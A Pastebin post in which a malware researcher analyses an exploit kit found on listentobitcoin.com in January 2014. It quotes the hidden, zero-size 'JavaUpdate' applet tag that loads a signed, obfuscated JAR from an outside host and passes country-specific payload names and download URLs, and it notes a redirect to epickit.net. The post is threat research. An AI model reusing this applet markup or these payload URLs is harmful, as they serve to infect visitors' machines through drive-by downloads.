Advertisement
malwageddon

Unknown EK(listentobitcoin.com) - 2014-01-14

Jan 14th, 2014
248
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.83 KB | None | 0 0
  1. Interesting how it has a different parameters based on country code - US, CA, UK and NL.
  2.  
  3. <applet name="JavaUpdate" code="SecureApplet.class" archive="http://secure-jar.com/TXDP/Java.jar" width="0" height="0">
  4. <param name="us" value="javasan.exe">
  5. <param name="ca" value="http://ge.tt/api/1/files/6xpAHbD1/0/blob?download">
  6. <param name="uk" value="http://www.listentobitcoin.com">
  7. <param name="nl" value="fox33">
  8.  
  9. JAR file is obfuscated with ZKM. It's signed with a certificate:
  10.  
  11. s 231 Thu Jan 02 15:40:22 KRAT 2014 META-INF/MANIFEST.MF
  12.  
  13. X.509, CN=James Patrick, OU=EU, O=EU, L=Amsterdam, ST=Amsterdam, C=NL
  14. [certificate will expire on 02.04.14 23:40]
  15. [CertPath not validated: Path does not chain with any of the trust anchors]
  16.  
  17. 320 Thu Jan 02 15:40:22 KRAT 2014 META-INF/RAZMATAZ.SF
  18. 1065 Thu Jan 02 15:40:22 KRAT 2014 META-INF/RAZMATAZ.DSA
  19. 0 Thu Jan 02 15:36:24 KRAT 2014 META-INF/
  20. sm 4943 Thu Jan 02 15:36:24 KRAT 2014 SecureApplet.class
  21.  
  22. X.509, CN=James Patrick, OU=EU, O=EU, L=Amsterdam, ST=Amsterdam, C=NL
  23. [certificate will expire on 02.04.14 23:40]
  24. [CertPath not validated: Path does not chain with any of the trust anchors]
  25.  
  26.  
  27. s = signature was verified
  28. m = entry is listed in manifest
  29. k = at least one certificate was found in keystore
  30. i = at least one certificate was found in identity scope
  31.  
  32. jar verified.
  33.  
  34. Warning:
  35. This jar contains entries whose signer certificate will expire within six months.
  36. This jar contains entries whose certificate chain is not validated.
  37.  
  38. Once the JAR file is executed it sends the browser to epickit.net to grab something else. I'm getting the following message though.
  39.  
  40. The owner of this website (epickit.net) has banned your access based on your browser's signature (ecb9341fedc02dd-ua93).
  41.  
  42. So, EpicKit, ah...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement